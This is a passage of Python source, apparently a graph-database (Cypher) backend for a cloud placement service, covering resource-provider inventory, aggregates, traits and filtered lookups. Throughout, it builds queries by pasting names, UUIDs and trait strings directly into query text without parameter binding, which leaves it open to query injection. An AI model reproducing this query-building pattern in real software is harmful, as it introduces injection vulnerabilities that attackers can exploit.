containing resource class IDs to search inv_list\n for updating in resource provider.\n :returns: A list of (uuid, class) tuples that have exceeded their\n capacity after this inventory update.\n \"\"\"\n current_allocs = get_allocated_inventory(ctx, rp)\n exceeded = []\n for rc in to_update:\n inv_record = inv_obj.find(inv_list, rc)\n # Get the current inventory\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})-->(rc:%s)\n RETURN id(rc) as rcid\n \"\"\" % (rp.uuid, rc)\n result = ctx.tx.run(query).data()\n if not result:\n raise exception.InventoryWithResourceClassNotFound(\n resource_class=rc)\n rcid = result[0][\"rcid\"]\n # Check if the new total - reserved is exceeded\n used = current_allocs.get(rc, 0)\n if inv_record.capacity < used:\n exceeded.append((rp.uuid, rc))\n # Create the update clause\n upds = []\n for att in (\"total\", \"reserved\", \"min_unit\", \"max_unit\", \"step_size\",\n \"allocation_ratio\"):\n upds.append(\"rc.%s=%s\" % (att, getattr(inv_record, att)))\n update_clause = \", \".join(upds)\n # Updated the inventory of the RC node\n query = \"\"\"\n MATCH (rc)\n WHERE id(rc) = %s\n SET %s\n RETURN rc\n \"\"\" % (rcid, update_clause)\n result = ctx.tx.run(query).data()\n return exceeded\n\n\n@db_api.placement_context_manager.writer\ndef _add_inventory(ctx, rp, inventory):\n \"\"\"Add one Inventory that wasn't already on the provider.\n\n :raises `exception.ResourceClassNotFound` if inventory.resource_class\n cannot be found in the DB.\n \"\"\"\n rc = inventory.resource_class\n query = \"\"\"\n MATCH (rc:RESOURCE_CLASS {name: '%s'})\n RETURN rc\n \"\"\" % rc\n result = ctx.tx.run(query).data()\n if not result:\n raise exception.ResourceClassNotFound(resource_class=rc)\n _add_inventory_to_provider(ctx, rp, [inventory])\n rp.increment_generation()\n\n\n@db_api.placement_context_manager.writer\ndef _update_inventory(ctx, rp, inventory):\n \"\"\"Update an inventory already on the provider.\n\n :raises `exception.ResourceClassNotFound` if inventory.resource_class\n cannot be found in the DB.\n \"\"\"\n exceeded = _update_inventory_for_provider(ctx, rp, [inventory],\n set([inventory.resource_class]))\n rp.increment_generation()\n return exceeded\n\n\n@db_api.placement_context_manager.writer\ndef _delete_inventory(ctx, rp, resource_class):\n \"\"\"Delete up to one Inventory of the given resource_class string.\n\n :raises `exception.ResourceClassNotFound` if resource_class\n cannot be found in the DB.\n \"\"\"\n if not _delete_inventory_from_provider(ctx, rp, [resource_class]):\n raise exception.NotFound(\n \"No inventory of class %s found for delete\" % resource_class)\n rp.increment_generation()\n\n\n@db_api.placement_context_manager.writer\ndef _set_inventory(ctx, rp, inv_list):\n \"\"\"Given a list of Inventory objects, replaces the inventory of the\n resource provider in a safe, atomic fashion using the resource\n provider's generation as a consistent view marker.\n\n :param ctx: Session context to use\n :param rp: `ResourceProvider` object upon which to set inventory.\n :param inv_list: A list of `Inventory` objects to save to backend storage.\n :returns: A list of (uuid, class) tuples that have exceeded their\n capacity after this inventory update.\n :raises placement.exception.ConcurrentUpdateDetected: if another thread\n updated the same resource provider's view of its inventory or\n allocations in between the time when this object was originally\n read and the call to set the inventory.\n :raises `exception.ResourceClassNotFound` if any resource class in any\n inventory in inv_list cannot be found in the DB.\n :raises `exception.InventoryInUse` if we attempt to delete inventory\n from a provider that has allocations for that resource class.\n \"\"\"\n existing_resources = get_current_inventory_resources(ctx, rp)\n these_resources = set([r.resource_class for r in inv_list])\n\n # Determine which resources we should be adding, deleting and/or\n # updating in the resource provider's inventory by comparing sets\n # of resource class identifiers.\n to_add = these_resources - existing_resources\n to_delete = existing_resources - these_resources\n to_update = these_resources & existing_resources\n exceeded = []\n\n if to_delete:\n _delete_inventory_from_provider(ctx, rp, to_delete)\n if to_add:\n inv_to_add = [inv for inv in inv_list if inv.resource_class in to_add]\n _add_inventory_to_provider(ctx, rp, inv_to_add)\n if to_update:\n exceeded = _update_inventory_for_provider(ctx, rp, inv_list,\n to_update)\n\n # Here is where we update the resource provider's generation value. If\n # this update updates zero rows, that means that another thread has updated\n # the inventory for this resource provider between the time the caller\n # originally read the resource provider record and inventory information\n # and this point. We raise an exception here which will rollback the above\n # transaction and return an error to the caller to indicate that they can\n # attempt to retry the inventory save after reverifying any capacity\n # conditions and re-reading the existing inventory information.\n rp.increment_generation()\n\n return exceeded\n\n\n@db_api.placement_context_manager.reader\ndef _get_provider_by_uuid(ctx, uuid):\n \"\"\"Given a UUID, return a dict of information about the resource provider\n from the database.\n\n :raises: NotFound if no such provider was found\n :param uuid: The UUID to look up\n \"\"\"\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n RETURN rp\n \"\"\" % uuid\n result = ctx.tx.run(query).data()\n if not result:\n raise exception.NotFound(\n \"No resource provider with uuid %s found\" % uuid)\n rp = db.pythonize(result[0][\"rp\"])\n return {\"uuid\": rp.uuid,\n \"name\": rp.name,\n \"generation\": rp.generation,\n \"updated_at\": rp.updated_at,\n \"created_at\": rp.created_at,\n }\n\n\n@db_api.placement_context_manager.reader\ndef _get_aggregates_by_provider(ctx, rp):\n \"\"\"Returns a list of UUIDs of any aggregates for the supplied resource\n provider.\n \"\"\"\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})-[:ASSOCIATED]-> (agg)\n RETURN agg.uuid AS agg_uuid\n \"\"\" % rp.uuid\n result = ctx.tx.run(query).data()\n return [rec[\"agg_uuid\"] for rec in result]\n\ndef _ensure_aggregate(ctx, agg_uuid):\n \"\"\"Finds an aggregate and returns its UUID (which is the same as the\n supplied parameter). If not found, creates the aggregate with the supplied\n UUID and returns the new aggregate's UUID.\n \"\"\"\n query = \"\"\"\n MERGE (agg:AGGREGATE {uuid: '%s'})\n RETURN agg\n \"\"\" % agg_uuid\n result = ctx.tx.run(query).data()\n return agg_uuid\n\n\n@db_api.placement_context_manager.writer\ndef associate(ctx, resource_provider, rp_uuids):\n \"\"\"Associates one or more resource providers with the specified resource\n provider. Note that the relationship is from RP to shared entity, as this\n is needed for resolving :PROVIDES relationships; e.g.:\n (rp)-[:ASSOCIATED]->(share)-[:PROVIDES]->(resource)\n \"\"\"\n # Make sure that the UUID of the resource_provider is not duplicated in the\n # rp_uuids. We don't want to associate an RP with itself!\n if resource_provider.uuid in rp_uuids:\n rp_uuids.remove(resource_provider.uuid)\n query = \"\"\"\n MATCH (share:RESOURCE_PROVIDER {{ uuid: '{rp_uuid}' }})\n WITH share\n MATCH (rp:RESOURCE_PROVIDER)\n WHERE rp.uuid IN {rp_list}\n WITH share, rp\n MERGE (rp)-[:ASSOCIATED]->(share)\n WITH rp, share\n WHERE rp <> share\n RETURN share\"\"\".format(rp_uuid=resource_provider.uuid,\n rp_list=util.makelist(rp_uuids))\n result = ctx.tx.run(query).data()\n\n@db_api.placement_context_manager.writer\ndef _set_aggregates(ctx, resource_provider, provided_aggregates,\n increment_generation=False):\n \"\"\"When aggregate uuids are persisted no validation is done to ensure that\n they refer to something that has meaning elsewhere. It is assumed that code\n which makes use of the aggregates, later, will validate their fitness.\n TODO(cdent): At the moment we do not delete a PlacementAggregate that no\n longer has any associations with at least one resource provider. We may\n wish to do that to avoid bloat if it turns out we're creating a lot of\n noise. Not doing now to move things along.\n \"\"\"\n provided_aggregates = set(provided_aggregates)\n existing_aggregates = _get_aggregates_by_provider(ctx,\n resource_provider)\n # A list of aggregate UUIDs that will be associated with the provider\n aggs_to_associate = provided_aggregates - set(existing_aggregates)\n # Same list for those aggregates to remove the association with this\n # provider\n aggs_to_disassociate = [agg_uuid for agg_uuid in existing_aggregates\n if agg_uuid not in provided_aggregates]\n\n if aggs_to_associate:\n stmnt = \"MERGE (agg%s:AGGREGATE {uuid: '%s'})\"\n creates = [stmnt % (num, agg_uuid)\n for num, agg_uuid in enumerate(aggs_to_associate)]\n create_clause = \"\\n\".join(creates)\n agg_withs = \", \".join([\"agg%s\" % num\n for num in range(len(aggs_to_associate))])\n assoc_lines = [\"MERGE (rp)-[:ASSOCIATED]->(agg{num}) \"\n \"WITH rp, {agg_withs} WHERE rp <> agg{num}\".format(\n num=num, agg_withs=agg_withs)\n for num in range(len(aggs_to_associate))]\n assoc_clause = \"\\n\".join(assoc_lines)\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n %s\n WITH rp, %s\n %s\n RETURN rp\n \"\"\" % (resource_provider.uuid, create_clause, agg_withs, assoc_clause)\n result = ctx.tx.run(query).data()\n\n if aggs_to_disassociate:\n # Delete the agg relationships no longer needed\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})-[a:ASSOCIATED]->\n (agg:AGGREGATE)\n WITH rp, a, agg\n WHERE agg.uuid in %s\n DELETE a\n \"\"\" % (resource_provider.uuid, aggs_to_disassociate)\n result = ctx.tx.run(query).data()\n if increment_generation:\n resource_provider.increment_generation()\n return\n\n\n@db_api.placement_context_manager.writer\ndef _set_traits(ctx, rp, traits):\n \"\"\"Given a ResourceProvider object and a list of Trait objects, replaces\n the set of traits associated with the resource provider.\n\n :raises: ConcurrentUpdateDetected if the resource provider's traits or\n inventory was changed in between the time when we first started to\n set traits and the end of this routine.\n\n :param rp: The ResourceProvider object to set traits against\n :param traits: List of Trait objects\n \"\"\"\n # Get the list of all trait names\n trait_names = trait_obj.Trait.get_all_names(ctx)\n # Get the traits for this RP\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n WITH rp\n MATCH (t:TRAIT)\n WHERE t.name IN keys(properties(rp))\n RETURN t.name AS trait_name\n \"\"\" % rp.uuid\n result = ctx.tx.run(query).data()\n existing_traits = set([rec[\"trait_name\"] for rec in result])\n new_traits = set([trait.name for trait in traits])\n to_add = new_traits - existing_traits\n to_delete = existing_traits - new_traits\n if not to_add and not to_delete:\n return\n # Remove the traits no longer needed\n del_list = []\n for del_trait in to_delete:\n del_list.append(\"rp.%s\" % del_trait)\n del_clause = \", \".join(del_list)\n if del_clause:\n del_clause = \"REMOVE \" + del_clause\n # Add the new traits, if any\n add_list = []\n for add_trait in to_add:\n add_list.append(\"rp.%s = true\" % add_trait)\n add_clause = \", \".join(add_list)\n if add_clause:\n add_clause = \"SET \" + add_clause\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n %s\n %s\n RETURN rp\n \"\"\" % (rp.uuid, add_clause, del_clause)\n result = ctx.tx.run(query).data()\n rp.increment_generation()\n\n\n@db_api.placement_context_manager.reader\ndef _has_child_providers(ctx, rp_uuid):\n \"\"\"Returns True if the supplied resource provider has any child providers,\n False otherwise\n \"\"\"\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})-[:CONTAINS]->(child)\n RETURN count(child) AS num\n \"\"\" % rp_uuid\n result = ctx.tx.run(query).data()\n return bool(result[0][\"num\"])\n\n\n@db_api.placement_context_manager.writer\ndef _set_root_provider_id(ctx, rp_id, root_id):\n \"\"\"Simply sets the root_provider_id value for a provider identified by\n rp_id. Used in implicit online data migration via REST API getting\n resource providers.\n\n :param rp_id: Internal ID of the provider to update\n :param root_id: Value to set root provider to\n\n NOTE (edleafe): This is not needed with a graph DB, and should be removed.\n \"\"\"\n return\n\n\n@db_api.placement_context_manager.writer\ndef set_root_provider_ids(context, batch_size):\n \"\"\"Simply sets the root_provider_id value for a provider identified by\n rp_id. Used in explicit online data migration via CLI.\n\n :param rp_id: Internal ID of the provider to update\n :param root_id: Value to set root provider to\n\n NOTE (edleafe): This is not needed with a graph DB, and should be removed.\n \"\"\"\n return\n\n\nclass ResourceProvider(object):\n SETTABLE_FIELDS = ('name', 'parent_provider_uuid')\n\n def __init__(self, ctx, uuid=None, name=None, generation=None,\n parent_provider_uuid=None, updated_at=None, created_at=None,\n provider_type=None, **kwargs):\n self._context = ctx\n self.uuid = uuid\n self.name = name\n self.generation = generation\n self.updated_at = updated_at\n self.created_at = created_at\n self.provider_type = provider_type\n # Hold this for setting relationships at create() time.\n self._parent_provider_uuid = parent_provider_uuid\n\n @property\n def root_provider_uuid(self):\n return _root_provider_for_rp(self._context, self)\n\n @property\n def parent_provider_uuid(self):\n return _parent_provider_for_rp(self._context, self)\n\n @parent_provider_uuid.setter\n def parent_provider_uuid(self, pp_uuid):\n self._parent_provider_uuid = pp_uuid\n\n def create(self):\n if self.uuid is None:\n raise exception.ObjectActionError(action='create',\n reason='uuid is required')\n if not self.name:\n raise exception.ObjectActionError(action='create',\n reason='name is required')\n\n # These are the only fields we are willing to create with.\n # If there are others, ignore them.\n updates = {\n 'name': self.name,\n 'uuid': self.uuid,\n 'parent_provider_uuid': self._parent_provider_uuid,\n }\n self._create_in_db(self._context, updates)\n\n def destroy(self):\n self._delete(self._context, self.uuid)\n\n def save(self):\n # These are the only fields we are willing to save with.\n # If there are others, ignore them.\n updates = {\n 'name': self.name,\n 'parent_provider_uuid': self._parent_provider_uuid,\n }\n self._update_in_db(self._context, updates)\n\n @classmethod\n def get_by_uuid(cls, ctx, uuid):\n \"\"\"Returns a new ResourceProvider object with the supplied UUID.\n\n :raises NotFound if no such provider could be found\n :param uuid: UUID of the provider to search for\n \"\"\"\n rp_rec = _get_provider_by_uuid(ctx, uuid)\n return cls._from_db_object(ctx, cls(ctx), rp_rec)\n\n def add_inventory(self, inventory):\n \"\"\"Add one new Inventory to the resource provider.\n\n Fails if Inventory of the provided resource class is\n already present.\n \"\"\"\n _add_inventory(self._context, self, inventory)\n\n def delete_inventory(self, resource_class):\n \"\"\"Delete Inventory of provided resource_class.\"\"\"\n _delete_inventory(self._context, self, resource_class)\n\n def set_inventory(self, inv_list):\n \"\"\"Set all resource provider Inventory to be the provided list.\"\"\"\n exceeded = _set_inventory(self._context, self, inv_list)\n for uuid, rclass in exceeded:\n LOG.warning('Resource provider %(uuid)s is now over-'\n 'capacity for %(resource)s',\n {'uuid': uuid, 'resource': rclass})\n\n def update_inventory(self, inventory):\n \"\"\"Update one existing Inventory of the same resource class.\n\n Fails if no Inventory of the same class is present.\n \"\"\"\n exceeded = _update_inventory(self._context, self, inventory)\n for uuid, rclass in exceeded:\n LOG.warning('Resource provider %(uuid)s is now over-'\n 'capacity for %(resource)s',\n {'uuid': uuid, 'resource': rclass})\n\n def get_aggregates(self):\n \"\"\"Get the aggregate uuids associated with this resource provider.\"\"\"\n return _get_aggregates_by_provider(self._context, self)\n\n def set_aggregates(self, aggregate_uuids, increment_generation=False):\n \"\"\"Set the aggregate uuids associated with this resource provider.\n\n If an aggregate does not exist, one will be created using the\n provided uuid.\n\n The resource provider generation is incremented if and only if the\n increment_generation parameter is True.\n \"\"\"\n _set_aggregates(self._context, self, aggregate_uuids,\n increment_generation=increment_generation)\n\n def set_traits(self, traits):\n \"\"\"Replaces the set of traits associated with the resource provider\n with the given list of Trait objects.\n\n :param traits: A list of Trait objects representing the traits to\n associate with the provider.\n \"\"\"\n _set_traits(self._context, self, traits)\n\n def increment_generation(self):\n \"\"\"Increments this provider's generation value, supplying the\n currently-known generation.\n\n :raises placement.exception.ConcurrentUpdateDetected: if another thread\n updated the resource provider's view of its inventory or\n allocations in between the time when this object was originally\n read and the call to set the inventory.\n \"\"\"\n rp_gen = self.generation\n new_generation = rp_gen + 1\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n WHERE rp.generation = %s\n WITH rp\n SET rp.generation = %s\n RETURN rp\n \"\"\" % (self.uuid, rp_gen, new_generation)\n result = self._context.tx.run(query).data()\n if not result:\n raise exception.ResourceProviderConcurrentUpdateDetected()\n self.generation = new_generation\n\n @db_api.placement_context_manager.writer\n def _create_in_db(self, ctx, updates):\n # User supplied a parent, let's make sure it exists\n parent_uuid = updates.pop('parent_provider_uuid')\n parent_create_clause = \"\"\n atts = [\"uuid: '%s'\" % self.uuid, \"name: '%s'\" % self.name,\n \"generation: 0\", \"created_at: timestamp()\",\n \"updated_at: timestamp()\"]\n if parent_uuid is not None:\n # Setting parent to ourselves doesn't make any sense\n if parent_uuid == self.uuid:\n raise exception.ObjectActionError(\n action=\"create\",\n reason=\"parent provider UUID cannot be same as UUID. \"\n \"Please set parent provider UUID to None if \"\n \"there is no parent.\")\n\n # Verify that the parent exists\n query = \"\"\"\n MATCH (parent:RESOURCE_PROVIDER {uuid: '%s'})\n RETURN parent\n \"\"\" % parent_uuid\n result = ctx.tx.run(query).data()\n if not result:\n raise exception.ObjectActionError(\n action='create',\n reason='parent provider UUID does not exist.')\n parent_create_clause = \"\"\"\n WITH rp\n MATCH (parent:RESOURCE_PROVIDER {uuid: '%s'})\n WITH rp, parent\n MERGE (parent)-[:CONTAINS]->(rp)\n \"\"\" % parent_uuid\n # Create the RP, and if there is a parent, create the relationship\n att_clause = \", \".join(atts)\n query = \"\"\"\n CREATE (rp:RESOURCE_PROVIDER {%s})\n %s\n RETURN rp\n \"\"\" % (att_clause, parent_create_clause)\n result = ctx.tx.run(query).data()\n rp_db = db.pythonize(result[0][\"rp\"])\n self.generation = rp_db.generation\n self.created_at = rp_db.created_at\n self.updated_at = rp_db.updated_at\n\n @staticmethod\n @db_api.placement_context_manager.writer\n def _delete(ctx, uuid):\n # First, we want to make sure that the RP exists\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n RETURN rp\n \"\"\" % uuid\n result = ctx.tx.run(query).data()\n if not result:\n raise exception.NotFound(\n \"No resource provider with uuid %s found\" % uuid)\n # Do a quick check to see if the provider is a parent. If it is, don't\n # allow deleting the provider. Note that the foreign key constraint on\n # resource_providers.parent_provider_id will prevent deletion of the\n # parent within the transaction below. This is just a quick\n # short-circuit outside of the transaction boundary.\n if _has_child_providers(ctx, uuid):\n raise exception.CannotDeleteParentResourceProvider()\n\n # Delete any inventory associated with the resource provider. This will\n # fail if the inventory has any allocations against it.\n try:\n _delete_inventory_from_provider(ctx, uuid)\n except exception.InventoryInUse:\n raise exception.ResourceProviderInUse()\n query = \"\"\"\n MATCH p=(me:RESOURCE_PROVIDER {uuid: '%s'})-[:PROVIDES]->(inv)\n WITH me, inv, last(relationships(p)) AS provisions\n DELETE provisions\n \"\"\" % uuid\n try:\n result = ctx.tx.run(query).data()\n except db.ClientError:\n raise exception.ResourceProviderInUse()\n query = \"\"\"\n MATCH (me:RESOURCE_PROVIDER {uuid: '%s'})-[:PROVIDES]->(inv)\n WITH inv\n DELETE inv\n \"\"\" % uuid\n try:\n result = ctx.tx.run(query).data()\n except db.ClientError:\n raise exception.ResourceProviderInUse()\n\n # Now delete the RP record\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n DETACH DELETE rp\n RETURN rp\n \"\"\" % uuid\n result = ctx.tx.run(query).data()\n\n @db_api.placement_context_manager.writer\n def _update_in_db(self, ctx, updates):\n # A list of resource providers in the same tree with the\n # resource provider to update\n same_tree = []\n if 'parent_provider_uuid' in updates:\n # TODO(jaypipes): For now, \"re-parenting\" and \"un-parenting\" are\n # not possible. If the provider already had a parent, we don't\n # allow changing that parent due to various issues, including:\n #\n # * if the new parent is a descendant of this resource provider, we\n # introduce the possibility of a loop in the graph, which would\n # be very bad\n # * potentially orphaning heretofore-descendants\n #\n # So, for now, let's just prevent re-parenting...\n parent_uuid = updates.get(\"parent_provider_uuid\")\n curr_parent_uuid = self.parent_provider_uuid\n if parent_uuid is not None:\n if (curr_parent_uuid is not None and\n (curr_parent_uuid != parent_uuid)):\n raise exception.ObjectActionError(\n action=\"update\",\n reason=\"re-parenting a provider is not currently \"\n \"allowed.\")\n # Make sure that the parent node exists\n query = \"\"\"\n MATCH (parent:RESOURCE_PROVIDER {uuid: '%s'})\n RETURN parent.uuid AS parent_uuid\n \"\"\" % parent_uuid\n result = ctx.tx.run(query).data()\n if not result:\n raise exception.ObjectActionError(\n action=\"create\",\n reason=\"parent provider UUID does not exist.\")\n if curr_parent_uuid is None:\n # We can set the parent relationship, but first we need to\n # check that this parent isn't already related to this\n # node, or else we can get a circular relationship instead\n # of a tree.\n query = \"\"\"\n // Get all the inbound relations\n MATCH (rp:RESOURCE_PROVIDER)-[*]->\n (:RESOURCE_PROVIDER {uuid:'%s'})\n RETURN rp\n UNION\n // Get all the outbound relations\n MATCH (:RESOURCE_PROVIDER {uuid:'%s'})-[*]->\n (rp:RESOURCE_PROVIDER)\n RETURN rp\n UNION\n // Get this node\n MATCH (rp:RESOURCE_PROVIDER {uuid:'%s'})\n RETURN rp\n \"\"\" % (self.uuid, self.uuid, self.uuid)\n result = ctx.tx.run(query).data()\n tree_uuids = [rec[\"rp\"][\"uuid\"] for rec in result]\n if parent_uuid in tree_uuids:\n raise exception.ObjectActionError(\n action=\"update\",\n reason=\"creating loop in the provider tree is \"\n \"not allowed.\")\n # Everything checks out; set the parent relationship\n query = \"\"\"\n MATCH (parent:RESOURCE_PROVIDER {uuid: '%s'})\n MATCH (me:RESOURCE_PROVIDER {uuid: '%s'})\n WITH parent, me\n CREATE (parent)-[:CONTAINS]->(me)\n RETURN parent\n \"\"\" % (parent_uuid, self.uuid)\n result = ctx.tx.run(query).data()\n else:\n # Ensure that a null parent uuid is not being passed when there\n # already is a parent to this node.\n query = \"\"\"\n MATCH (parent:RESOURCE_PROVIDER)-[:CONTAINS]->\n (:RESOURCE_PROVIDER {uuid: '%s'})\n RETURN parent\n \"\"\" % self.uuid\n result = ctx.tx.run(query).data()\n if result:\n raise exception.ObjectActionError(\n action='update',\n reason='un-parenting a provider is not currently '\n 'allowed.')\n\n update_lines = []\n for key, val in updates.items():\n if isinstance(val, six.string_types):\n txt = \"rp.%s = '%s'\" % (key, val)\n else:\n if val is None:\n val = \"null\"\n txt = \"rp.%s = %s\" % (key, val)\n update_lines.append(txt)\n if not \"generation\" in updates and not hasattr(self, \"generation\"):\n update_lines.append(\"rp.generation = 0\")\n if not \"created_at\" in updates and not hasattr(self, \"created_at\"):\n update_lines.append(\"rp.created_at = timestamp()\")\n if not \"updated_at\" in updates:\n update_lines.append(\"rp.updated_at = timestamp()\")\n update_clause = \", \".join(update_lines)\n query = \"\"\"\n MERGE (rp:RESOURCE_PROVIDER {uuid: '%s'})\n WITH rp\n SET %s\n RETURN rp\n \"\"\" % (self.uuid, update_clause)\n result = ctx.tx.run(query).data()\n self._from_db_object(ctx, self, db.pythonize(result[0][\"rp\"]))\n\n @staticmethod\n @db_api.placement_context_manager.writer # For online data migration\n def _from_db_object(ctx, resource_provider, db_resource_provider):\n for field in [\"uuid\", \"name\", \"generation\", \"updated_at\",\n \"created_at\"]:\n setattr(resource_provider, field, db_resource_provider.get(field))\n return resource_provider\n\n @classmethod\n def create_tree(cls, ctx, tree):\n \"\"\"This method accepts a nested dict that describes a tree-like\n relationship among resource providers. Each node on the tree should\n contain the following keys:\n name: the name given to the resource. If not supplied, no name is\n set.\n uuid: the resource's UUID. If not supplied, one will be generated.\n resources: a dict of resources that this node provides directly.\n Each member should be of the form `resource_class: amount`\n traits: a list of traits to apply to this node.\n children: a list of nodes representing the children of this node.\n Each child node should be the same format dict as described\n here.\n\n The root provider of the newly-created tree is returned.\n\n Note: There is no limit to the level of nesting for child resource\n providers.\n \"\"\"\n rp_rec = _create_tree(ctx, tree)\n return cls._from_db_object(ctx, cls(ctx), rp_rec)\n\n\n@db_api.placement_context_manager.reader\ndef get_providers_with_shared_capacity(ctx, rc_name, amount, member_of=None):\n \"\"\"Returns a list of resource provider UUIDs that have capacity for a\n requested amount of a resource and indicate that they share resource via an\n aggregate association.\n\n For example, assume we have two compute nodes, CN_1 and CN_2, each with\n inventory of VCPU and MEMORY_MB but not DISK_GB (in other words, these are\n compute nodes with no local disk). There is a resource provider called\n \"NFS_SHARE\" that has an inventory of DISK_GB. Both the \"CN_1\" and \"CN_2\"\n compute node resource providers are related to the \"NFS_SHARE\" resource\n provider with an [:ASSOCIATED] relationship.\n\n The scheduler needs to determine the resource providers that can fulfill a\n request for 2 VCPU, 1024 MEMORY_MB and 100 DISK_GB.\n\n Clearly, no single provider can satisfy the request for all three\n resources, since neither compute node has DISK_GB inventory and the\n NFS_SHARE provider has no VCPU or MEMORY_MB inventories.\n\n However, if we consider the NFS_SHARE resource provider as providing\n inventory of DISK_GB for both CN_1 and CN_2, we can include CN_1 and CN_2\n as potential fits for the requested set of resources.\n\n To facilitate that matching query, this function returns all providers that\n indicate they share their inventory with providers in some aggregate and\n have enough capacity for the requested amount of a resource.\n\n To follow the example above, if we were to call\n get_providers_with_shared_capacity(ctx, \"DISK_GB\", 100), we would want to\n get back the ID for the NFS_SHARE resource provider.\n\n :param rc_name: Name of the requested resource class.\n :param amount: Amount of the requested resource.\n :param member_of: When present, contains a list of lists of aggregate\n uuids that are used to filter the returned list of\n resource providers that *directly* belong to the\n aggregates referenced.\n \"\"\"\n query = \"\"\"\n MATCH ()-[:ASSOCIATED]->(rp:RESOURCE_PROVIDER)\n WITH rp\n MATCH (rp)-[:PROVIDES]->(rc:%s)\n WITH rp, rc\n OPTIONAL MATCH p=(cs:CONSUMER)-[:USES]->(rc)\n WITH rp, rc, relationships(p)[0] AS usages\n WITH rp, rc, sum(usages.amount) AS total_used,\n ((rc.total - rc.reserved) * rc.allocation_ratio) AS capacity\n MATCH (rc)\n WHERE capacity - total_used >= %s\n RETURN rp.uuid AS rp_uuid\n \"\"\" % (rc_name, amount)\n result = ctx.tx.run(query).data()\n return [rec[\"rp_uuid\"] for rec in result]\n\n\n@db_api.placement_context_manager.reader\ndef _get_all_by_filters_from_db(ctx, filters):\n # Eg. filters can be:\n # filters = {\n # 'name': ,\n # 'uuid': ,\n # 'member_of': [[, ],\n # []]\n # 'forbidden_aggs': [, ]\n # 'resources': {\n # 'VCPU': 1,\n # 'MEMORY_MB': 1024\n # },\n # 'in_tree': ,\n # 'required': [, ...]\n # }\n if not filters:\n filters = {}\n else:\n # Since we modify the filters, copy them so that we don't modify\n # them in the calling program.\n filters = copy.deepcopy(filters)\n name = filters.pop('name', None)\n uuid = filters.pop('uuid', None)\n member_of = filters.pop('member_of', [])\n forbidden_aggs = filters.pop('forbidden_aggs', [])\n required = set(filters.pop('required', []))\n forbidden = set([trait for trait in required\n if trait.startswith('!')])\n required = required - forbidden\n forbidden = set([trait.lstrip('!') for trait in forbidden])\n resources = filters.pop('resources', {})\n in_tree = filters.pop('in_tree', None)\n\n rp_props = []\n if name:\n rp_props.append(\"name: '%s'\" % name)\n if uuid:\n rp_props.append(\"uuid: '%s'\" % uuid)\n if rp_props:\n rp_prop_str = \" {%s}\" % \", \".join(rp_props)\n else:\n rp_prop_str = \"\"\n rp_str =\"rp:RESOURCE_PROVIDER%s\" % rp_prop_str\n\n # Build the query line-by-line, incorporating all the filters\n query_lines = []\n if in_tree:\n tree_query = \"\"\"\n MATCH (root:RESOURCE_PROVIDER)-[:CONTAINS*0..99]->\n (tree:RESOURCE_PROVIDER {uuid: '%s'})\n OPTIONAL MATCH r=()-->(root)\n WITH root, relationships(r) AS rootrel\n WHERE rootrel IS null\n MATCH (root)-[:CONTAINS*0..99]->(%s)\n WITH rp\n \"\"\" % (in_tree, rp_str)\n query_lines.append(tree_query)\n else:\n query_lines.append(\"MATCH (%s)\" % rp_str)\n query_lines.append(\"WITH rp\")\n\n if resources:\n # This will raise a 'ResourceClassNotFound' exception if any resource\n # classes are not valid names. \n res_ctx.validate_resources(ctx, list(resources.keys()))\n rps_with_rsrcs = []\n for rc_name, amount in resources.items():\n rps = res_ctx.get_providers_with_resource(ctx, rc_name, amount)\n rps_with_rsrcs.append(set([rp[0] for rp in rps]))\n good_rps = rps_with_rsrcs[0]\n for rsrc_set in rps_with_rsrcs[1:]:\n good_rps.intersection_update(rsrc_set)\n # Now create the query lines to limit RPs to just those with sufficient\n # resources.\n query_lines.append(\"WHERE rp.uuid IN %s\" % list(good_rps))\n query_lines.append(\"WITH rp\")\n\n if member_of:\n for num, agg in enumerate(member_of):\n query_lines.append(\"MATCH (rp)-[:ASSOCIATED]->(agg{num})\".format(\n num=num))\n query_lines.append(\"WHERE agg{num}.uuid IN {agglist}\".format(\n num=num, agglist=util.makelist(agg)))\n query_lines.append(\"WITH rp\")\n if forbidden_aggs:\n for agg in forbidden_aggs:\n query_lines.append(\"MATCH (badagg:AGGREGATE)\")\n query_lines.append(\"WHERE badagg.uuid in {agg}\".format(agg=util.makelist(agg)))\n query_lines.append(\"WITH rp, badagg\")\n query_lines.append(\"WHERE NOT EXISTS( (rp)-[:ASSOCIATED]->(badagg) )\")\n query_lines.append(\"WITH rp\")\n trait_filters = []\n # This will raise a 'TraitNotFound' exception if any required or forbidden\n # traits are specified. These values are passed in as sets.\n all_traits = required | forbidden\n res_ctx.validate_traits(ctx, all_traits)\n for trait in required:\n trait_filters.append(\"EXISTS(rp.%s)\" % trait)\n for trait in forbidden:\n trait_filters.append(\"NOT EXISTS(rp.%s)\" % trait)\n trait_str = \" AND \".join(trait_filters)\n if trait_str:\n query_lines.append(\"WHERE %s\" % trait_str)\n query_lines.append(\"WITH rp\")\n query_lines.append(\"RETURN rp\")\n query = \"\\n\".join(query_lines)\n result = ctx.tx.run(query).data()\n return [db.pythonize(rec[\"rp\"]) for rec in result]\n\n\ndef get_all_by_filters(ctx, filters=None):\n \"\"\"Returns a list of `ResourceProvider` objects that have sufficient\n resources in their inventories to satisfy the amounts specified in the\n `filters` parameter.\n\n If no resource providers can be found, the function will return an\n empty list.\n\n :param ctx: `placement.context.RequestContext` that may be used to\n grab a DB connection.\n :param filters: Can be `name`, `uuid`, `member_of`, `in_tree` or\n `resources` where `member_of` is a list of list of\n aggregate UUIDs, `in_tree` is a UUID of a resource\n provider that we can use to find the root provider ID\n of the tree of providers to filter results by and\n `resources` is a dict of amounts keyed by resource\n classes.\n :type filters: dict\n \"\"\"\n resource_providers = _get_all_by_filters_from_db(ctx, filters)\n return 